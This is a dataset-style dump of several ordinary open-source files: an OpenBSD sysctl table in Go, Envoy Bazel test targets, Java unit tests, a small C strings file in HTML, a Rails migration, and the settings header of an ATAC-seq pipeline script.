text
stringlengths
2
100k
meta
dict
// mksysctl_openbsd.pl // MACHINE GENERATED BY THE ABOVE COMMAND; DO NOT EDIT package unix type mibentry struct { ctlname string ctloid []_C_int } var sysctlMib = []mibentry{ {"ddb.console", []_C_int{9, 6}}, {"ddb.log", []_C_int{9, 7}}, {"ddb.max_line", []_C_int{9, 3}}, {"ddb.max_width", []_C_int{9, 2}}, {"ddb.panic", []_C_int{9, 5}}, {"ddb.radix", []_C_int{9, 1}}, {"ddb.tab_stop_width", []_C_int{9, 4}}, {"ddb.trigger", []_C_int{9, 8}}, {"fs.posix.setuid", []_C_int{3, 1, 1}}, {"hw.allowpowerdown", []_C_int{6, 22}}, {"hw.byteorder", []_C_int{6, 4}}, {"hw.cpuspeed", []_C_int{6, 12}}, {"hw.diskcount", []_C_int{6, 10}}, {"hw.disknames", []_C_int{6, 8}}, {"hw.diskstats", []_C_int{6, 9}}, {"hw.machine", []_C_int{6, 1}}, {"hw.model", []_C_int{6, 2}}, {"hw.ncpu", []_C_int{6, 3}}, {"hw.ncpufound", []_C_int{6, 21}}, {"hw.pagesize", []_C_int{6, 7}}, {"hw.physmem", []_C_int{6, 19}}, {"hw.product", []_C_int{6, 15}}, {"hw.serialno", []_C_int{6, 17}}, {"hw.setperf", []_C_int{6, 13}}, {"hw.usermem", []_C_int{6, 20}}, {"hw.uuid", []_C_int{6, 18}}, {"hw.vendor", []_C_int{6, 14}}, {"hw.version", []_C_int{6, 16}}, {"kern.arandom", []_C_int{1, 37}}, {"kern.argmax", []_C_int{1, 8}}, {"kern.boottime", []_C_int{1, 21}}, {"kern.bufcachepercent", []_C_int{1, 72}}, {"kern.ccpu", []_C_int{1, 45}}, {"kern.clockrate", []_C_int{1, 12}}, {"kern.consdev", []_C_int{1, 75}}, {"kern.cp_time", []_C_int{1, 40}}, {"kern.cp_time2", []_C_int{1, 71}}, {"kern.cryptodevallowsoft", []_C_int{1, 53}}, {"kern.domainname", []_C_int{1, 22}}, {"kern.file", []_C_int{1, 73}}, {"kern.forkstat", []_C_int{1, 42}}, {"kern.fscale", []_C_int{1, 46}}, {"kern.fsync", []_C_int{1, 33}}, {"kern.hostid", []_C_int{1, 11}}, {"kern.hostname", []_C_int{1, 10}}, {"kern.intrcnt.nintrcnt", []_C_int{1, 63, 1}}, {"kern.job_control", []_C_int{1, 19}}, {"kern.malloc.buckets", []_C_int{1, 39, 1}}, {"kern.malloc.kmemnames", []_C_int{1, 39, 3}}, {"kern.maxclusters", []_C_int{1, 67}}, {"kern.maxfiles", []_C_int{1, 7}}, {"kern.maxlocksperuid", 
[]_C_int{1, 70}}, {"kern.maxpartitions", []_C_int{1, 23}}, {"kern.maxproc", []_C_int{1, 6}}, {"kern.maxthread", []_C_int{1, 25}}, {"kern.maxvnodes", []_C_int{1, 5}}, {"kern.mbstat", []_C_int{1, 59}}, {"kern.msgbuf", []_C_int{1, 48}}, {"kern.msgbufsize", []_C_int{1, 38}}, {"kern.nchstats", []_C_int{1, 41}}, {"kern.netlivelocks", []_C_int{1, 76}}, {"kern.nfiles", []_C_int{1, 56}}, {"kern.ngroups", []_C_int{1, 18}}, {"kern.nosuidcoredump", []_C_int{1, 32}}, {"kern.nprocs", []_C_int{1, 47}}, {"kern.nselcoll", []_C_int{1, 43}}, {"kern.nthreads", []_C_int{1, 26}}, {"kern.numvnodes", []_C_int{1, 58}}, {"kern.osrelease", []_C_int{1, 2}}, {"kern.osrevision", []_C_int{1, 3}}, {"kern.ostype", []_C_int{1, 1}}, {"kern.osversion", []_C_int{1, 27}}, {"kern.pool_debug", []_C_int{1, 77}}, {"kern.posix1version", []_C_int{1, 17}}, {"kern.proc", []_C_int{1, 66}}, {"kern.random", []_C_int{1, 31}}, {"kern.rawpartition", []_C_int{1, 24}}, {"kern.saved_ids", []_C_int{1, 20}}, {"kern.securelevel", []_C_int{1, 9}}, {"kern.seminfo", []_C_int{1, 61}}, {"kern.shminfo", []_C_int{1, 62}}, {"kern.somaxconn", []_C_int{1, 28}}, {"kern.sominconn", []_C_int{1, 29}}, {"kern.splassert", []_C_int{1, 54}}, {"kern.stackgap_random", []_C_int{1, 50}}, {"kern.sysvipc_info", []_C_int{1, 51}}, {"kern.sysvmsg", []_C_int{1, 34}}, {"kern.sysvsem", []_C_int{1, 35}}, {"kern.sysvshm", []_C_int{1, 36}}, {"kern.timecounter.choice", []_C_int{1, 69, 4}}, {"kern.timecounter.hardware", []_C_int{1, 69, 3}}, {"kern.timecounter.tick", []_C_int{1, 69, 1}}, {"kern.timecounter.timestepwarnings", []_C_int{1, 69, 2}}, {"kern.tty.maxptys", []_C_int{1, 44, 6}}, {"kern.tty.nptys", []_C_int{1, 44, 7}}, {"kern.tty.tk_cancc", []_C_int{1, 44, 4}}, {"kern.tty.tk_nin", []_C_int{1, 44, 1}}, {"kern.tty.tk_nout", []_C_int{1, 44, 2}}, {"kern.tty.tk_rawcc", []_C_int{1, 44, 3}}, {"kern.tty.ttyinfo", []_C_int{1, 44, 5}}, {"kern.ttycount", []_C_int{1, 57}}, {"kern.userasymcrypto", []_C_int{1, 60}}, {"kern.usercrypto", []_C_int{1, 52}}, 
{"kern.usermount", []_C_int{1, 30}}, {"kern.version", []_C_int{1, 4}}, {"kern.vnode", []_C_int{1, 13}}, {"kern.watchdog.auto", []_C_int{1, 64, 2}}, {"kern.watchdog.period", []_C_int{1, 64, 1}}, {"net.bpf.bufsize", []_C_int{4, 31, 1}}, {"net.bpf.maxbufsize", []_C_int{4, 31, 2}}, {"net.inet.ah.enable", []_C_int{4, 2, 51, 1}}, {"net.inet.ah.stats", []_C_int{4, 2, 51, 2}}, {"net.inet.carp.allow", []_C_int{4, 2, 112, 1}}, {"net.inet.carp.log", []_C_int{4, 2, 112, 3}}, {"net.inet.carp.preempt", []_C_int{4, 2, 112, 2}}, {"net.inet.carp.stats", []_C_int{4, 2, 112, 4}}, {"net.inet.divert.recvspace", []_C_int{4, 2, 258, 1}}, {"net.inet.divert.sendspace", []_C_int{4, 2, 258, 2}}, {"net.inet.divert.stats", []_C_int{4, 2, 258, 3}}, {"net.inet.esp.enable", []_C_int{4, 2, 50, 1}}, {"net.inet.esp.stats", []_C_int{4, 2, 50, 4}}, {"net.inet.esp.udpencap", []_C_int{4, 2, 50, 2}}, {"net.inet.esp.udpencap_port", []_C_int{4, 2, 50, 3}}, {"net.inet.etherip.allow", []_C_int{4, 2, 97, 1}}, {"net.inet.etherip.stats", []_C_int{4, 2, 97, 2}}, {"net.inet.gre.allow", []_C_int{4, 2, 47, 1}}, {"net.inet.gre.wccp", []_C_int{4, 2, 47, 2}}, {"net.inet.icmp.bmcastecho", []_C_int{4, 2, 1, 2}}, {"net.inet.icmp.errppslimit", []_C_int{4, 2, 1, 3}}, {"net.inet.icmp.maskrepl", []_C_int{4, 2, 1, 1}}, {"net.inet.icmp.rediraccept", []_C_int{4, 2, 1, 4}}, {"net.inet.icmp.redirtimeout", []_C_int{4, 2, 1, 5}}, {"net.inet.icmp.stats", []_C_int{4, 2, 1, 7}}, {"net.inet.icmp.tstamprepl", []_C_int{4, 2, 1, 6}}, {"net.inet.igmp.stats", []_C_int{4, 2, 2, 1}}, {"net.inet.ip.arpqueued", []_C_int{4, 2, 0, 36}}, {"net.inet.ip.encdebug", []_C_int{4, 2, 0, 12}}, {"net.inet.ip.forwarding", []_C_int{4, 2, 0, 1}}, {"net.inet.ip.ifq.congestion", []_C_int{4, 2, 0, 30, 4}}, {"net.inet.ip.ifq.drops", []_C_int{4, 2, 0, 30, 3}}, {"net.inet.ip.ifq.len", []_C_int{4, 2, 0, 30, 1}}, {"net.inet.ip.ifq.maxlen", []_C_int{4, 2, 0, 30, 2}}, {"net.inet.ip.maxqueue", []_C_int{4, 2, 0, 11}}, {"net.inet.ip.mforwarding", []_C_int{4, 2, 0, 31}}, 
{"net.inet.ip.mrtproto", []_C_int{4, 2, 0, 34}}, {"net.inet.ip.mrtstats", []_C_int{4, 2, 0, 35}}, {"net.inet.ip.mtu", []_C_int{4, 2, 0, 4}}, {"net.inet.ip.mtudisc", []_C_int{4, 2, 0, 27}}, {"net.inet.ip.mtudisctimeout", []_C_int{4, 2, 0, 28}}, {"net.inet.ip.multipath", []_C_int{4, 2, 0, 32}}, {"net.inet.ip.portfirst", []_C_int{4, 2, 0, 7}}, {"net.inet.ip.porthifirst", []_C_int{4, 2, 0, 9}}, {"net.inet.ip.porthilast", []_C_int{4, 2, 0, 10}}, {"net.inet.ip.portlast", []_C_int{4, 2, 0, 8}}, {"net.inet.ip.redirect", []_C_int{4, 2, 0, 2}}, {"net.inet.ip.sourceroute", []_C_int{4, 2, 0, 5}}, {"net.inet.ip.stats", []_C_int{4, 2, 0, 33}}, {"net.inet.ip.ttl", []_C_int{4, 2, 0, 3}}, {"net.inet.ipcomp.enable", []_C_int{4, 2, 108, 1}}, {"net.inet.ipcomp.stats", []_C_int{4, 2, 108, 2}}, {"net.inet.ipip.allow", []_C_int{4, 2, 4, 1}}, {"net.inet.ipip.stats", []_C_int{4, 2, 4, 2}}, {"net.inet.mobileip.allow", []_C_int{4, 2, 55, 1}}, {"net.inet.pfsync.stats", []_C_int{4, 2, 240, 1}}, {"net.inet.pim.stats", []_C_int{4, 2, 103, 1}}, {"net.inet.tcp.ackonpush", []_C_int{4, 2, 6, 13}}, {"net.inet.tcp.always_keepalive", []_C_int{4, 2, 6, 22}}, {"net.inet.tcp.baddynamic", []_C_int{4, 2, 6, 6}}, {"net.inet.tcp.drop", []_C_int{4, 2, 6, 19}}, {"net.inet.tcp.ecn", []_C_int{4, 2, 6, 14}}, {"net.inet.tcp.ident", []_C_int{4, 2, 6, 9}}, {"net.inet.tcp.keepidle", []_C_int{4, 2, 6, 3}}, {"net.inet.tcp.keepinittime", []_C_int{4, 2, 6, 2}}, {"net.inet.tcp.keepintvl", []_C_int{4, 2, 6, 4}}, {"net.inet.tcp.mssdflt", []_C_int{4, 2, 6, 11}}, {"net.inet.tcp.reasslimit", []_C_int{4, 2, 6, 18}}, {"net.inet.tcp.rfc1323", []_C_int{4, 2, 6, 1}}, {"net.inet.tcp.rfc3390", []_C_int{4, 2, 6, 17}}, {"net.inet.tcp.rstppslimit", []_C_int{4, 2, 6, 12}}, {"net.inet.tcp.sack", []_C_int{4, 2, 6, 10}}, {"net.inet.tcp.sackholelimit", []_C_int{4, 2, 6, 20}}, {"net.inet.tcp.slowhz", []_C_int{4, 2, 6, 5}}, {"net.inet.tcp.stats", []_C_int{4, 2, 6, 21}}, {"net.inet.tcp.synbucketlimit", []_C_int{4, 2, 6, 16}}, 
{"net.inet.tcp.syncachelimit", []_C_int{4, 2, 6, 15}}, {"net.inet.udp.baddynamic", []_C_int{4, 2, 17, 2}}, {"net.inet.udp.checksum", []_C_int{4, 2, 17, 1}}, {"net.inet.udp.recvspace", []_C_int{4, 2, 17, 3}}, {"net.inet.udp.sendspace", []_C_int{4, 2, 17, 4}}, {"net.inet.udp.stats", []_C_int{4, 2, 17, 5}}, {"net.inet6.divert.recvspace", []_C_int{4, 24, 86, 1}}, {"net.inet6.divert.sendspace", []_C_int{4, 24, 86, 2}}, {"net.inet6.divert.stats", []_C_int{4, 24, 86, 3}}, {"net.inet6.icmp6.errppslimit", []_C_int{4, 24, 30, 14}}, {"net.inet6.icmp6.mtudisc_hiwat", []_C_int{4, 24, 30, 16}}, {"net.inet6.icmp6.mtudisc_lowat", []_C_int{4, 24, 30, 17}}, {"net.inet6.icmp6.nd6_debug", []_C_int{4, 24, 30, 18}}, {"net.inet6.icmp6.nd6_delay", []_C_int{4, 24, 30, 8}}, {"net.inet6.icmp6.nd6_maxnudhint", []_C_int{4, 24, 30, 15}}, {"net.inet6.icmp6.nd6_mmaxtries", []_C_int{4, 24, 30, 10}}, {"net.inet6.icmp6.nd6_prune", []_C_int{4, 24, 30, 6}}, {"net.inet6.icmp6.nd6_umaxtries", []_C_int{4, 24, 30, 9}}, {"net.inet6.icmp6.nd6_useloopback", []_C_int{4, 24, 30, 11}}, {"net.inet6.icmp6.nodeinfo", []_C_int{4, 24, 30, 13}}, {"net.inet6.icmp6.rediraccept", []_C_int{4, 24, 30, 2}}, {"net.inet6.icmp6.redirtimeout", []_C_int{4, 24, 30, 3}}, {"net.inet6.ip6.accept_rtadv", []_C_int{4, 24, 17, 12}}, {"net.inet6.ip6.auto_flowlabel", []_C_int{4, 24, 17, 17}}, {"net.inet6.ip6.dad_count", []_C_int{4, 24, 17, 16}}, {"net.inet6.ip6.dad_pending", []_C_int{4, 24, 17, 49}}, {"net.inet6.ip6.defmcasthlim", []_C_int{4, 24, 17, 18}}, {"net.inet6.ip6.forwarding", []_C_int{4, 24, 17, 1}}, {"net.inet6.ip6.forwsrcrt", []_C_int{4, 24, 17, 5}}, {"net.inet6.ip6.hdrnestlimit", []_C_int{4, 24, 17, 15}}, {"net.inet6.ip6.hlim", []_C_int{4, 24, 17, 3}}, {"net.inet6.ip6.log_interval", []_C_int{4, 24, 17, 14}}, {"net.inet6.ip6.maxdynroutes", []_C_int{4, 24, 17, 48}}, {"net.inet6.ip6.maxfragpackets", []_C_int{4, 24, 17, 9}}, {"net.inet6.ip6.maxfrags", []_C_int{4, 24, 17, 41}}, {"net.inet6.ip6.maxifdefrouters", []_C_int{4, 24, 17, 
47}}, {"net.inet6.ip6.maxifprefixes", []_C_int{4, 24, 17, 46}}, {"net.inet6.ip6.mforwarding", []_C_int{4, 24, 17, 42}}, {"net.inet6.ip6.mrtproto", []_C_int{4, 24, 17, 8}}, {"net.inet6.ip6.mtudisctimeout", []_C_int{4, 24, 17, 50}}, {"net.inet6.ip6.multicast_mtudisc", []_C_int{4, 24, 17, 44}}, {"net.inet6.ip6.multipath", []_C_int{4, 24, 17, 43}}, {"net.inet6.ip6.neighborgcthresh", []_C_int{4, 24, 17, 45}}, {"net.inet6.ip6.redirect", []_C_int{4, 24, 17, 2}}, {"net.inet6.ip6.rr_prune", []_C_int{4, 24, 17, 22}}, {"net.inet6.ip6.sourcecheck", []_C_int{4, 24, 17, 10}}, {"net.inet6.ip6.sourcecheck_logint", []_C_int{4, 24, 17, 11}}, {"net.inet6.ip6.use_deprecated", []_C_int{4, 24, 17, 21}}, {"net.inet6.ip6.v6only", []_C_int{4, 24, 17, 24}}, {"net.key.sadb_dump", []_C_int{4, 30, 1}}, {"net.key.spd_dump", []_C_int{4, 30, 2}}, {"net.mpls.ifq.congestion", []_C_int{4, 33, 3, 4}}, {"net.mpls.ifq.drops", []_C_int{4, 33, 3, 3}}, {"net.mpls.ifq.len", []_C_int{4, 33, 3, 1}}, {"net.mpls.ifq.maxlen", []_C_int{4, 33, 3, 2}}, {"net.mpls.mapttl_ip", []_C_int{4, 33, 5}}, {"net.mpls.mapttl_ip6", []_C_int{4, 33, 6}}, {"net.mpls.maxloop_inkernel", []_C_int{4, 33, 4}}, {"net.mpls.ttl", []_C_int{4, 33, 2}}, {"net.pflow.stats", []_C_int{4, 34, 1}}, {"net.pipex.enable", []_C_int{4, 35, 1}}, {"vm.anonmin", []_C_int{2, 7}}, {"vm.loadavg", []_C_int{2, 2}}, {"vm.maxslp", []_C_int{2, 10}}, {"vm.nkmempages", []_C_int{2, 6}}, {"vm.psstrings", []_C_int{2, 3}}, {"vm.swapencrypt.enable", []_C_int{2, 5, 0}}, {"vm.swapencrypt.keyscreated", []_C_int{2, 5, 1}}, {"vm.swapencrypt.keysdeleted", []_C_int{2, 5, 2}}, {"vm.uspace", []_C_int{2, 11}}, {"vm.uvmexp", []_C_int{2, 4}}, {"vm.vmmeter", []_C_int{2, 1}}, {"vm.vnodemin", []_C_int{2, 9}}, {"vm.vtextmin", []_C_int{2, 8}}, }
{ "pile_set_name": "Github" }
load( "//bazel:envoy_build_system.bzl", "envoy_cc_mock", "envoy_package", ) load( "//test/extensions:extensions_build_system.bzl", "envoy_extension_benchmark_test", "envoy_extension_cc_benchmark_binary", "envoy_extension_cc_test", ) licenses(["notice"]) # Apache 2 envoy_package() envoy_extension_cc_test( name = "command_splitter_impl_test", srcs = ["command_splitter_impl_test.cc"], extension_name = "envoy.filters.network.redis_proxy", # This test takes a while to run specially under tsan. # Shard it to avoid test timeout. shard_count = 2, deps = [ ":redis_mocks", "//source/common/stats:isolated_store_lib", "//source/common/stats:stats_lib", "//source/extensions/filters/network/common/redis:fault_lib", "//source/extensions/filters/network/redis_proxy:command_splitter_lib", "//source/extensions/filters/network/redis_proxy:router_interface", "//test/extensions/filters/network/common/redis:redis_mocks", "//test/mocks:common_lib", "//test/mocks/event:event_mocks", "//test/mocks/stats:stats_mocks", "//test/test_common:simulated_time_system_lib", "//test/test_common:test_runtime_lib", ], ) envoy_extension_cc_test( name = "conn_pool_impl_test", srcs = ["conn_pool_impl_test.cc"], extension_name = "envoy.filters.network.redis_proxy", deps = [ ":redis_mocks", "//source/common/event:dispatcher_lib", "//source/common/network:utility_lib", "//source/common/upstream:upstream_includes", "//source/common/upstream:upstream_lib", "//source/extensions/filters/network/common/redis:utility_lib", "//source/extensions/filters/network/redis_proxy:conn_pool_lib", "//test/extensions/clusters/redis:redis_cluster_mocks", "//test/extensions/common/redis:mocks_lib", "//test/extensions/filters/network/common/redis:redis_mocks", "//test/extensions/filters/network/common/redis:test_utils_lib", "//test/mocks/api:api_mocks", "//test/mocks/network:network_mocks", "//test/mocks/thread_local:thread_local_mocks", "//test/mocks/upstream:cluster_manager_mocks", "//test/mocks/upstream:cluster_mocks", 
"//test/mocks/upstream:cluster_update_callbacks_handle_mocks", "//test/mocks/upstream:cluster_update_callbacks_mocks", "//test/mocks/upstream:host_mocks", "//test/mocks/upstream:host_set_mocks", "//test/mocks/upstream:thread_local_cluster_mocks", "@envoy_api//envoy/config/cluster/redis:pkg_cc_proto", "@envoy_api//envoy/config/cluster/v3:pkg_cc_proto", "@envoy_api//envoy/extensions/filters/network/redis_proxy/v3:pkg_cc_proto", ], ) envoy_extension_cc_test( name = "proxy_filter_test", srcs = ["proxy_filter_test.cc"], extension_name = "envoy.filters.network.redis_proxy", deps = [ ":redis_mocks", "//source/common/event:dispatcher_lib", "//source/extensions/filters/network/redis_proxy:proxy_filter_lib", "//test/extensions/filters/network/common/redis:redis_mocks", "//test/mocks:common_lib", "//test/mocks/api:api_mocks", "//test/mocks/network:network_mocks", "//test/test_common:utility_lib", "@envoy_api//envoy/extensions/filters/network/redis_proxy/v3:pkg_cc_proto", ], ) envoy_cc_mock( name = "redis_mocks", srcs = ["mocks.cc"], hdrs = ["mocks.h"], deps = [ "//source/common/common:assert_lib", "//source/extensions/common/redis:cluster_refresh_manager_interface", "//source/extensions/filters/network/common/redis:client_interface", "//source/extensions/filters/network/common/redis:codec_lib", "//source/extensions/filters/network/common/redis:fault_interface", "//source/extensions/filters/network/redis_proxy:command_splitter_interface", "//source/extensions/filters/network/redis_proxy:conn_pool_interface", "//source/extensions/filters/network/redis_proxy:router_interface", ], ) envoy_extension_cc_test( name = "config_test", srcs = ["config_test.cc"], extension_name = "envoy.filters.network.redis_proxy", deps = [ "//source/common/protobuf:utility_lib", "//source/extensions/filters/network/redis_proxy:config", "//test/mocks/server:factory_context_mocks", "//test/test_common:test_runtime_lib", "@envoy_api//envoy/extensions/filters/network/redis_proxy/v3:pkg_cc_proto", ], ) 
envoy_extension_cc_benchmark_binary( name = "command_lookup_speed_test", srcs = ["command_lookup_speed_test.cc"], extension_name = "envoy.filters.network.redis_proxy", external_deps = [ "benchmark", ], deps = [ ":redis_mocks", "//source/common/stats:isolated_store_lib", "//source/common/stats:stats_lib", "//source/extensions/filters/network/redis_proxy:command_splitter_lib", "//test/mocks/event:event_mocks", "//test/test_common:printers_lib", "//test/test_common:simulated_time_system_lib", ], ) envoy_extension_benchmark_test( name = "command_lookup_speed_test_benchmark_test", benchmark_binary = "command_lookup_speed_test", extension_name = "envoy.filters.network.redis_proxy", ) envoy_extension_cc_test( name = "router_impl_test", srcs = ["router_impl_test.cc"], extension_name = "envoy.filters.network.redis_proxy", deps = [ ":redis_mocks", "//source/extensions/filters/network/redis_proxy:router_lib", "//test/extensions/filters/network/common/redis:redis_mocks", "//test/mocks/runtime:runtime_mocks", "//test/test_common:utility_lib", "@envoy_api//envoy/extensions/filters/network/redis_proxy/v3:pkg_cc_proto", "@envoy_api//envoy/type/v3:pkg_cc_proto", ], ) envoy_extension_cc_test( name = "redis_proxy_integration_test", srcs = ["redis_proxy_integration_test.cc"], extension_name = "envoy.filters.network.redis_proxy", deps = [ "//source/extensions/filters/network/common/redis:fault_lib", "//source/extensions/filters/network/redis_proxy:config", "//test/integration:integration_lib", ], ) envoy_extension_cc_benchmark_binary( name = "command_split_speed_test", srcs = ["command_split_speed_test.cc"], extension_name = "envoy.filters.network.redis_proxy", external_deps = [ "benchmark", ], deps = [ ":redis_mocks", "//source/common/stats:isolated_store_lib", "//source/common/stats:stats_lib", "//source/extensions/filters/network/redis_proxy:command_splitter_lib", "//source/extensions/filters/network/redis_proxy:router_lib", "//test/test_common:printers_lib", 
"//test/test_common:simulated_time_system_lib", ], ) envoy_extension_benchmark_test( name = "command_split_speed_test_benchmark_test", benchmark_binary = "command_split_speed_test", extension_name = "envoy.filters.network.redis_proxy", )
{ "pile_set_name": "Github" }
/* * Copyright (c) 2015 Goldman Sachs. * All rights reserved. This program and the accompanying materials * are made available under the terms of the Eclipse Public License v1.0 * and Eclipse Distribution License v. 1.0 which accompany this distribution. * The Eclipse Public License is available at http://www.eclipse.org/legal/epl-v10.html * and the Eclipse Distribution License is available at * http://www.eclipse.org/org/documents/edl-v10.php. */ package org.eclipse.collections.impl.map.mutable.primitive; import org.eclipse.collections.impl.test.Verify; import org.junit.Test; public class UnmodifiableShortShortMapSerializationTest { @Test public void serializedForm() { Verify.assertSerializedForm( 1L, "rO0ABXNyAExvcmcuZWNsaXBzZS5jb2xsZWN0aW9ucy5pbXBsLm1hcC5tdXRhYmxlLnByaW1pdGl2\n" + "ZS5Vbm1vZGlmaWFibGVTaG9ydFNob3J0TWFwAAAAAAAAAAECAAFMAANtYXB0AEBMb3JnL2VjbGlw\n" + "c2UvY29sbGVjdGlvbnMvYXBpL21hcC9wcmltaXRpdmUvTXV0YWJsZVNob3J0U2hvcnRNYXA7eHBz\n" + "cgBEb3JnLmVjbGlwc2UuY29sbGVjdGlvbnMuaW1wbC5tYXAubXV0YWJsZS5wcmltaXRpdmUuU2hv\n" + "cnRTaG9ydEhhc2hNYXAAAAAAAAAAAQwAAHhwdwQAAAAAeA==", new UnmodifiableShortShortMap(new ShortShortHashMap())); } @Test public void keySetSerializedForm() { Verify.assertSerializedForm( 1L, "rO0ABXNyAEdvcmcuZWNsaXBzZS5jb2xsZWN0aW9ucy5pbXBsLnNldC5tdXRhYmxlLnByaW1pdGl2\n" + "ZS5Vbm1vZGlmaWFibGVTaG9ydFNldAAAAAAAAAABAgAAeHIAXW9yZy5lY2xpcHNlLmNvbGxlY3Rp\n" + "b25zLmltcGwuY29sbGVjdGlvbi5tdXRhYmxlLnByaW1pdGl2ZS5BYnN0cmFjdFVubW9kaWZpYWJs\n" + "ZVNob3J0Q29sbGVjdGlvbgAAAAAAAAABAgABTAAKY29sbGVjdGlvbnQASUxvcmcvZWNsaXBzZS9j\n" + "b2xsZWN0aW9ucy9hcGkvY29sbGVjdGlvbi9wcmltaXRpdmUvTXV0YWJsZVNob3J0Q29sbGVjdGlv\n" + "bjt4cHNyAFRvcmcuZWNsaXBzZS5jb2xsZWN0aW9ucy5pbXBsLm1hcC5tdXRhYmxlLnByaW1pdGl2\n" + "ZS5BYnN0cmFjdE11dGFibGVTaG9ydEtleVNldCRTZXJSZXAAAAAAAAAAAQwAAHhwdwQAAAAAeA==\n", new UnmodifiableShortShortMap(new ShortShortHashMap()).keySet()); } }
{ "pile_set_name": "Github" }
<?xml version='1.0' encoding='iso-8859-1'?> <!doctype html public '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'> <html xmlns='http://www.w3c.org/1999/xhtml' lang='en-us'> <head> <title> StationRole.c </title> <meta http-equiv='content-type' content='text/html;iso-8859-1'/> <meta name='generator' content='motley-tools 1.9.4 13:40:33 Feb 18 2015'/> <meta name='author' content='[email protected]'/> <meta name='robots' content='noindex,nofollow'/> <link href='toolkit.css' rel='stylesheet' type='text/css'/> </head> <body> <div class='headerlink'> [<a href='StartFirmware.c.html' title=' StartFirmware.c '>PREV</a>] [<a href='toolkit.html' title=' Index '>HOME</a>] [<a href='strdecr.c.html' title=' strdecr.c '>NEXT</a>] </div> <pre> /*====================================================================* * * Copyright (c) 2013 Qualcomm Atheros, Inc. * * All rights reserved. * * Redistribution and use in source and binary forms, with or * without modification, are permitted (subject to the limitations * in the disclaimer below) provided that the following conditions * are met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * * Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following * disclaimer in the documentation and/or other materials * provided with the distribution. * * * Neither the name of Qualcomm Atheros nor the names of * its contributors may be used to endorse or promote products * derived from this software without specific prior written * permission. * * NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE * GRANTED BY THIS LICENSE. 
THIS SOFTWARE IS PROVIDED BY THE * COPYRIGHT HOLDERS AND CONTRIBUTORS &quot;AS IS&quot; AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE * OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * *--------------------------------------------------------------------*/ /*====================================================================* * * StationRole.c - Station Role Strings; * * plc.h * *--------------------------------------------------------------------*/ #ifndef STATIONROLE_SOURCE #define STATIONROLE_SOURCE #include &quot;../plc/plc.h&quot; char const * StationRole [] = { &quot;STA&quot;, &quot;PCO&quot;, &quot;CCO&quot; }; #endif </pre> <div class='footerlink'> [<a href='StartFirmware.c.html' title=' StartFirmware.c '>PREV</a>] [<a href='toolkit.html' title=' Index '>HOME</a>] [<a href='strdecr.c.html' title=' strdecr.c '>NEXT</a>] </div> </body> </html>
{ "pile_set_name": "Github" }
/** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.waveprotocol.wave.client.wavepanel.view; import junit.framework.TestCase; import java.util.ArrayList; import java.util.HashSet; import java.util.Random; public class ModelIdMapperImplTest extends TestCase { public void testMapping() throws Exception { ModelIdMapperImpl impl = ModelIdMapperImpl.create(null, "empty"); verifyMapper(impl); } private void verifyMapper(ModelIdMapperImpl impl) { HashSet<String> shortIdSet = new HashSet<String>(); HashSet<String> longIdSet = new HashSet<String>(); ArrayList<String> shortIds = new ArrayList<String>(); ArrayList<String> longIds = new ArrayList<String>(); Random random = new Random(); // ensure unique while (longIdSet.size() < 100) { String longId = Integer.toBinaryString(random.nextInt()); while (longIdSet.contains(longId)) { longId = Integer.toBinaryString(random.nextInt()); } longIdSet.add(longId); String shortId = impl.shorten(longId); assertFalse("Short Id is already in the set " + shortId + " set " + shortIdSet, shortIdSet .contains(shortId)); shortIdSet.add(shortId); shortIds.add(shortId); longIds.add(longId); } for (int i = 0; i < shortIds.size(); i++) { assertEquals("The shortId returned for repeated longId is not the same", 
shortIds.get(i), impl.shorten(longIds.get(i))); assertEquals("Restoring of the shortIds is not the same as long id", longIds.get(i), impl .restoreId(shortIds.get(i))); } } public void testCorrectForm() { ModelIdMapperImpl impl = new ModelIdMapperImpl(null, "empty", 42); assertEquals("Next id not of expected form", "empty42", impl.shorten("1234")); verifyMapper(impl); } }
{ "pile_set_name": "Github" }
class CreateCountries < ActiveRecord::Migration[4.2] def change create_table :countries do |t| t.string :name t.timestamps end end end
{ "pile_set_name": "Github" }
#!/usr/bin/env bds #vim: syntax=java help == atac pipeline settings type := "atac-seq" help Type of the pipeline. atac-seq or dnase-seq (default: atac-seq). dnase_seq := false help DNase-Seq (no tn5 shifting). align := false help Align only (no MACS2 peak calling or IDR or ataqc analysis). subsample_xcor := "25M" help # reads to subsample for cross corr. analysis (default: 25M). subsample := "0" help # reads to subsample exp. replicates. Subsampled tagalign will be used for steps downstream (default: 0; no subsampling). true_rep := false help No pseudo-replicates. no_ataqc := false help No ATAQC no_xcor := false help No Cross-correlation analysis. csem := false help Use CSEM for alignment. smooth_win := "150" help Smoothing window size for MACS2 peak calling (default: 150). idr_thresh := 0.1 help IDR threshold : -log_10(score) (default: 0.1). ENCODE3 := false help Force to use parameter set (-smooth_win 73 -idr_thresh 0.05 -multimapping 4) for ENCODE3. 